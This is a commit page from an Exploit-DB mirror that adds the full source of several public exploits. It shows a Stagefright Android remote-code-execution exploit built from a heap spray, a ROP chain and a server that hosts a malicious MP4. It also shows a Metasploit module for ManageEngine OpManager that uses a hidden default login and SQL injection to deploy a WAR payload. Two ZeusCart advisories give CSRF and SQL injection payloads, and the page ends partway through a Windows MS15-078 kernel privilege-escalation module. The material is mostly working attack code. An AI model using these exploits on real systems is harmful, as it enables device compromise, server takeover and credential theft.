bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-18

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-09-18 05:02:42 +00:00
parent eb00d41c2e
commit b81cdc3a7b
10 changed files with 1600 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -34512,3 +34512,12 @@ id,file,description,date,author,platform,type,port
38215,platforms/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0
38216,platforms/windows/dos/38216.txt,"Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion",2015-09-16,"Google Security Research",windows,dos,0
38217,platforms/windows/dos/38217.txt,"Microsoft Office 2007 - OGL.dll ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",windows,dos,0
38218,platforms/windows/local/38218.py,"IKEView.exe R60 - .elg Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0
38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0
38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0
38221,platforms/java/remote/38221.rb,"ManageEngine OpManager Remote Code Execution",2015-09-17,metasploit,java,remote,0
38222,platforms/win64/local/38222.rb,"MS15-078 Microsoft Windows Font Driver Buffer Overflow",2015-09-17,metasploit,win64,local,0
38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - CSRF Vulnerability",2015-09-17,"Curesec Research Team",php,webapps,80
38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80
38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0
38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0

Can't render this file because it is too large.

391
platforms/android/remote/38226.py Executable file
View file

@ -0,0 +1,391 @@
#!/usr/bin/python2
import cherrypy
import os
import pwnlib.asm as asm
import pwnlib.elf as elf
import sys
import struct
with open('shellcode.bin', 'rb') as tmp:
shellcode = tmp.read()
while len(shellcode) % 4 != 0:
shellcode += '\x00'
# heap grooming configuration
alloc_size = 0x20
groom_count = 0x4
spray_size = 0x100000
spray_count = 0x10
# address of the buffer we allocate for our shellcode
mmap_address = 0x90000000
# addresses that we need to predict
libc_base = 0xb6ebd000
spray_address = 0xb3000000
# ROP gadget addresses
stack_pivot = None
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None
ldr_lr_bx_lr_stack_pad = 0
mmap64 = None
memcpy = None
def find_arm_gadget(e, gadget):
gadget_bytes = asm.asm(gadget, arch='arm')
gadget_address = None
for address in e.search(gadget_bytes):
if address % 4 == 0:
gadget_address = address
if gadget_bytes == e.read(gadget_address, len(gadget_bytes)):
print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
break
return gadget_address
def find_thumb_gadget(e, gadget):
gadget_bytes = asm.asm(gadget, arch='thumb')
gadget_address = None
for address in e.search(gadget_bytes):
if address % 2 == 0:
gadget_address = address + 1
if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)):
print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
break
return gadget_address
def find_gadget(e, gadget):
gadget_address = find_thumb_gadget(e, gadget)
if gadget_address is not None:
return gadget_address
return find_arm_gadget(e, gadget)
def find_rop_gadgets(path):
global memcpy
global mmap64
global stack_pivot
global pop_pc
global pop_r0_r1_r2_r3_pc
global pop_r4_r5_r6_r7_pc
global ldr_lr_bx_lr
global ldr_lr_bx_lr_stack_pad
e = elf.ELF(path)
e.address = libc_base
memcpy = e.symbols['memcpy']
print '[*] memcpy : 0x{:08x}'.format(memcpy)
mmap64 = e.symbols['mmap64']
print '[*] mmap64 : 0x{:08x}'.format(mmap64)
# .text:00013344 ADD R2, R0, #0x4C
# .text:00013348 LDMIA R2, {R4-LR}
# .text:0001334C TEQ SP, #0
# .text:00013350 TEQNE LR, #0
# .text:00013354 BEQ botch_0
# .text:00013358 MOV R0, R1
# .text:0001335C TEQ R0, #0
# .text:00013360 MOVEQ R0, #1
# .text:00013364 BX LR
pivot_asm = ''
pivot_asm += 'add r2, r0, #0x4c\n'
pivot_asm += 'ldmia r2, {r4 - lr}\n'
pivot_asm += 'teq sp, #0\n'
pivot_asm += 'teqne lr, #0'
stack_pivot = find_arm_gadget(e, pivot_asm)
print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)
pop_pc_asm = 'pop {pc}'
pop_pc = find_gadget(e, pop_pc_asm)
print '[*] pop_pc : 0x{:08x}'.format(pop_pc)
pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)
pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)
ldr_lr_bx_lr_stack_pad = 0
for i in range(0, 0x100, 4):
ldr_lr_bx_lr_asm = 'ldr lr, [sp, #0x{:08x}]\n'.format(i)
ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
ldr_lr_bx_lr_asm += 'bx lr'
ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
if ldr_lr_bx_lr is not None:
ldr_lr_bx_lr_stack_pad = i
break
def pad(size):
return '#' * size
def pb32(val):
return struct.pack(">I", val)
def pb64(val):
return struct.pack(">Q", val)
def p32(val):
return struct.pack("<I", val)
def p64(val):
return struct.pack("<Q", val)
def chunk(tag, data, length=0):
if length == 0:
length = len(data) + 8
if length > 0xffffffff:
return pb32(1) + tag + pb64(length)+ data
return pb32(length) + tag + data
def alloc_avcc(size):
avcc = 'A' * size
return chunk('avcC', avcc)
def alloc_hvcc(size):
hvcc = 'H' * size
return chunk('hvcC', hvcc)
def sample_table(data):
stbl = ''
stbl += chunk('stco', '\x00' * 8)
stbl += chunk('stsc', '\x00' * 8)
stbl += chunk('stsz', '\x00' * 12)
stbl += chunk('stts', '\x00' * 8)
stbl += data
return chunk('stbl', stbl)
def memory_leak(size):
pssh = 'leak'
pssh += 'L' * 16
pssh += pb32(size)
pssh += 'L' * size
return chunk('pssh', pssh)
def heap_spray(size):
pssh = 'spry'
pssh += 'S' * 16
pssh += pb32(size)
page = ''
nop = asm.asm('nop', arch='thumb')
while len(page) < 0x100:
page += nop
page += shellcode
while len(page) < 0xed0:
page += '\xcc'
# MPEG4DataSource fake vtable
page += p32(stack_pivot)
# pivot swaps stack then returns to pop {pc}
page += p32(pop_r0_r1_r2_r3_pc)
# mmap64(mmap_address,
# 0x1000,
# PROT_READ | PROT_WRITE | PROT_EXECUTE,
# MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,
# -1,
# 0);
page += p32(mmap_address) # r0 = address
page += p32(0x1000) # r1 = size
page += p32(7) # r2 = protection
page += p32(0x32) # r3 = flags
page += p32(ldr_lr_bx_lr) # pc
page += pad(ldr_lr_bx_lr_stack_pad)
page += p32(pop_r4_r5_r6_r7_pc) # lr
page += pad(4)
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(mmap64) # pc
page += p32(0xffffffff) # fd (and then r4)
page += pad(4) # padding (and then r5)
page += p64(0) # offset (and then r6, r7)
page += p32(pop_r0_r1_r2_r3_pc) # pc
# memcpy(shellcode_address,
# spray_address + len(rop_stack),
# len(shellcode));
page += p32(mmap_address) # r0 = dst
page += p32(spray_address - 0xed0) # r1 = src
page += p32(0xed0) # r2 = size
page += p32(0x33333333) # r3
page += p32(ldr_lr_bx_lr) # pc
page += pad(ldr_lr_bx_lr_stack_pad)
page += p32(pop_r4_r5_r6_r7_pc) # lr
page += pad(4)
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(memcpy) # pc
page += p32(0x44444444) # r4
page += p32(0x55555555) # r5
page += p32(0x66666666) # r6
page += p32(0x77777777) # r7
page += p32(mmap_address + 1) # pc
while len(page) < 0x1000:
page += '#'
pssh += page * (size // 0x1000)
return chunk('pssh', pssh)
def exploit_mp4():
ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))
trak = ''
# heap spray so we have somewhere to land our corrupted vtable
# pointer
# yes, we wrap this in a sample_table for a reason; the
# NuCachedSource we will be using otherwise triggers calls to mmap,
# leaving our large allocations non-contiguous and making our chance
# of failure pretty high. wrapping in a sample_table means that we
# wrap the NuCachedSource with an MPEG4Source, making a single
# allocation that caches all the data, doubling our heap spray
# effectiveness :-)
trak += sample_table(heap_spray(spray_size) * spray_count)
# heap groom for our MPEG4DataSource corruption
# get the default size allocations for our MetaData::typed_data
# groom allocations out of the way first, by allocating small blocks
# instead.
trak += alloc_avcc(8)
trak += alloc_hvcc(8)
# we allocate the initial tx3g chunk here; we'll use the integer
# overflow so that the allocated buffer later is smaller than the
# original size of this chunk, then overflow all of the following
# MPEG4DataSource object and the following pssh allocation; hence why
# we will need the extra groom allocation (so we don't overwrite
# anything sensitive...)
# | tx3g | MPEG4DataSource | pssh |
overflow = 'A' * 24
# | tx3g ----------------> | pssh |
overflow += p32(spray_address) # MPEG4DataSource vtable ptr
overflow += '0' * 0x48
overflow += '0000' # r4
overflow += '0000' # r5
overflow += '0000' # r6
overflow += '0000' # r7
overflow += '0000' # r8
overflow += '0000' # r9
overflow += '0000' # r10
overflow += '0000' # r11
overflow += '0000' # r12
overflow += p32(spray_address + 0x20) # sp
overflow += p32(pop_pc) # lr
trak += chunk("tx3g", overflow)
# defragment the for alloc_size blocks, then make our two
# allocations. we end up with a spurious block in the middle, from
# the temporary ABuffer deallocation.
# | pssh | - | pssh |
trak += memory_leak(alloc_size) * groom_count
# | pssh | - | pssh | .... | avcC |
trak += alloc_avcc(alloc_size)
# | pssh | - | pssh | .... | avcC | hvcC |
trak += alloc_hvcc(alloc_size)
# | pssh | - | pssh | pssh | avcC | hvcC | pssh |
trak += memory_leak(alloc_size) * 8
# | pssh | - | pssh | pssh | avcC | .... |
trak += alloc_hvcc(alloc_size * 2)
# entering the stbl chunk triggers allocation of an MPEG4DataSource
# object
# | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
stbl = ''
# | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
stbl += alloc_avcc(alloc_size * 2)
# | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
# | pssh | - | pssh | pssh | tx3g ----------------> |
overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
stbl += chunk("tx3g", '', length = overflow_length)
trak += chunk('stbl', stbl)
return ftyp + chunk('trak', trak)
index_page = '''
<!DOCTYPE html>
<html>
<head>
<title>Stagefrightened!</title>
</head>
<body>
<script>
window.setTimeout('location.reload(true);', 4000);
</script>
<iframe src='/exploit.mp4'></iframe>
</body>
</html>
'''
class ExploitServer(object):
exploit_file = None
exploit_count = 0
@cherrypy.expose
def index(self):
self.exploit_count += 1
print '*' * 80
print 'exploit attempt: ' + str(self.exploit_count)
print '*' * 80
return index_page
@cherrypy.expose(["exploit.mp4"])
def exploit(self):
cherrypy.response.headers['Content-Type'] = 'video/mp4'
cherrypy.response.headers['Content-Encoding'] = 'gzip'
if self.exploit_file is None:
exploit_uncompressed = exploit_mp4()
with open('exploit_uncompressed.mp4', 'wb') as tmp:
tmp.write(exploit_uncompressed)
os.system('gzip exploit_uncompressed.mp4')
with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
self.exploit_file = tmp.read()
os.system('rm exploit_uncompressed.mp4.gz')
return self.exploit_file
def main():
find_rop_gadgets('libc.so')
with open('exploit.mp4', 'wb') as tmp:
tmp.write(exploit_mp4())
cherrypy.quickstart(ExploitServer())
if __name__ == '__main__':
main()

180
platforms/java/remote/38221.rb Executable file
View file

@ -0,0 +1,180 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# It removes large object in database, shoudn't be a problem, but just in case....
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine OpManager Remote Code Execution',
'Description' => %q{
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload. This
module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
[ 'EDB', '38174' ],
],
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
'DefaultTarget' => 0))
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'LoginPage.do')
})
unless res && res.code == 200
return Exploit::CheckCode::Safe
end
if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
if Gem::Version.new(version) <= Gem::Version.new('11.6')
return Exploit::CheckCode::Appears
else
# Patch unknown
return Exploit::CheckCode::Detected
end
elsif res.body =~ /OpManager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query( key, query )
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
'vars_get' => { 'apiKey' => key },
'vars_post' => { 'query' => query }
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
end
res
end
def exploit
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
'vars_post' => {
'domainName' => 'NULL',
'authType' => 'localUserLogin',
'userName' => 'IntegrationUser', # Hidden user
'password' => 'plugin' # Password of hidden user
}
})
if res && res.code == 302
redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => redirect,
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
api_key = $1
print_status("#{peer} - Retrieved API key [ #{api_key} ]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
end
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(api_key, sql)
if result.body =~ /lo_create":([0-9]+)}/
lo_id = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
sql_query(api_key, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
sql_query(api_key, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
register_file_for_cleanup("tomcat//webapps//#{app_base}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end

47
platforms/php/webapps/38223.txt Executable file
View file

@ -0,0 +1,47 @@
ZeusCart 4.0: CSRF
Security Advisory Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
None of the forms of Zeuscart have CSRF protection, which means that an
attacker can perform actions for the victim if the victim visits an
attacker controlled site while logged in.
3. Proof of Concept
Change Admin Credentials:
<form name="myform" method="post"
action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update"
enctype="multipart/form-data">
<input type="hidden" name="admin_name" value="admin2">
<input type="hidden" name="admin_email" value="admin2@example.com">
<input type="hidden" name="admin_password" value="admin">
</form>
<script>document.myform.submit();</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
6. Blog Reference
http://blog.curesec.com/article/blog/ZeusCart-40-CSRF-58.html

173
platforms/php/webapps/38224.txt Executable file
View file

@ -0,0 +1,173 @@
ZeusCart 4.0: SQL Injection
Security Advisory Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There are at least two SQL Injections in ZeusCart 4.0, one being a blind
injection which does not require credentials to be exploited, the other
being a standard injection in the admin area.
Because the prevention of SQL Injection depends to a large part on
applying simple filters on most input instead of using prepared
stamements, it is highly likely that there will be more SQL injection
vulnerabilities that are not covered here.
3. Timing based Blind SQL Injection
There is a blind timing based SQL injection into the maincatid argument.
An attacker does not need to be authenticated to exploit this.
Proof Of Concept
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)
-> true
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)
-> false
Please note that there is a bug when displaying featured items, so this
will display an error message or show a blank page. The timing
difference is still present, and can thus be exploited, but content
based exploitation is not possible because of this.
Also note that quotes may not be used in the payload, as quotes are
sanitized. It is still possible to extract data:
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(ascii(substring((SELECT password from mysql.user limit
0,1),1,1))=42,BENCHMARK(500000000,version()),null)
-> true, password hash starts with *
Code
/classes/Core/CFeaturedItems.php:52
$maincatid = $_GET['maincatid'];
[...]
$sql = "SELECT DISTINCT a.category_name AS
Category,a.category_id AS maincatid, b.category_name AS SubCategory,
b.category_id as subcatid, b.category_image AS image FROM category_table
a INNER JOIN category_table b ON a.category_id = b.category_parent_id
WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";
4. SQL Injection in Admin Area
All GET, POST, and REQUEST input is sanitized via filter_var($value,
FILTER_SANITIZE_STRING), which offers some protection against SQL
injection and XSS, but is not recommended as only defense.
For many queries, there is no further defense via escaping or prepared
statements. This makes all queries that get their data from different
sources than GET, POST, and REQUEST - such as FILES -, and all queries
containing unquoted parameters - such as seen in the blind injection
above - vulnerable.
Proof Of Concept
The steps to reproduce this issue are as following
Log in as admin
Create a new product, using a file name for ufile[0] like:
"image.jpgblla', description=(SELECT password FROM mysql.user limit
0,1), image='test
Visiting
http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID
will give the result of the injected query.
Curl command to create a new product:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0)
Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type:
multipart/form-data; boundary=--------2025782171' \
-b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \
--data-binary $'----------2025782171\x0d\x0aContent-Disposition:
form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose
Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\',
description=(SELECT password FROM mysql.user limit 0,1),
image=\'test\"\x0d\x0aContent-Type:
image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \
'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'
Code
CProductEntry.php:313
$imgfilename= $_FILES['ufile']['name'][$i];
$imagefilename =
date("Y-m-d-His").$imgfilename ; // generate a new name
$image="images/products/". $imagefilename;
// updated into DB
[...]
if($i==0)
{
$imgType='main';
$update="UPDATE products_table set
image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where
product_id='".$product_id."'";
$obj->updateQuery($update);
}
else
{
$imgType='sub';
}
if($_FILES['ufile']['name'][$i]!='')
{
$query_img="INSERT INTO
product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)
VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";
$obj_img=new Bin_Query();
$obj_img->updateQuery($query_img);
}
}
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
7. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-SQL-Injection-56.html

396
platforms/win64/local/38222.rb Executable file
View file

@ -0,0 +1,396 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ManualRanking
WIN32K_VERSIONS = [
'6.3.9600.17393',
'6.3.9600.17630',
'6.3.9600.17694',
'6.3.9600.17796',
'6.3.9600.17837',
'6.3.9600.17915'
]
NT_VERSIONS = [
'6.3.9600.17415',
'6.3.9600.17630',
'6.3.9600.17668',
'6.3.9600.17936'
]
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
'Description' => %q{
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
a malformed font. The vulnerability was exploited by the hacking team and disclosed on
the july data leak. This module has been tested successfully on vulnerable builds of
Windows 8.1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Eugene Ching', # vulnerability discovery and exploit
'Mateusz Jurczyk', # vulnerability discovery
'Cedric Halbronn', # vulnerability and exploit analysis
'juan vazquez' # msf module
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows 8.1 x64', { } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2015-2426'],
['CVE', '2015-2433'],
['MSB', 'MS15-078'],
['MSB', 'MS15-080'],
['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
],
'DisclosureDate' => 'Jul 11 2015',
'DefaultTarget' => 0
}))
end
def patch_win32k_offsets(dll)
@win32k_offsets.each do |k, v|
case k
when 'info_leak'
dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
when 'pop_rax_ret'
dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp'
dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool'
dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
when 'pop_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
when 'deref_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
when 'pop_rbx_ret'
dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
when 'ret'
dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_r11_ret'
dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
when 'add_rax_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
when 'pop_rsp_ret'
dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp_adjust'
dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
when 'chwnd_delete'
dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_win32k_offsets
@win32k_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17393'
{
'info_leak' => 0x3cf00,
'pop_rax_ret' => 0x19fab, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x6121, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x352220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x98156, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc432f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc4332, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x6e314, # ret C3
'mov_rax_r11_ret' => 0x7018e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xee38f, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbc8f, # pop rsp # ret # 5c c3
'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
'chwnd_delete' => 0x165010 # CHwndTargetProp::Delete
}
when '6.3.9600.17630'
{
'info_leak' => 0x3d200,
'pop_rax_ret' => 0x19e9b, # pop rax # ret # 58 C3
'xchg_rax_rsp' => 0x6024, # xchg eax, esp # ret # 94 C3
'allocate_pool' => 0x351220, # import entry nt!ExAllocatePoolWithTag
'pop_rcx_ret' => 0x84f4f, # pop rcx # ret # 59 C3
'deref_rax_into_rcx' => 0xc3f7f, # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
'mov_rax_into_rcx' => 0xc3f82, # mov [rcx], rax # ret # 48 89 01 C3
'pop_rbx_ret' => 0x14db, # pop rbx # ret # 5B C3
'ret' => 0x14dc, # ret C3
'mov_rax_r11_ret' => 0x7034e, # mov rax, r11 # ret # 49 8B C3 C3
'add_rax_rcx_ret' => 0xed33b, # add rax, rcx # ret # 48 03 C1 C3
'pop_rsp_ret' => 0xbb93, # pop rsp # ret # 5c c3
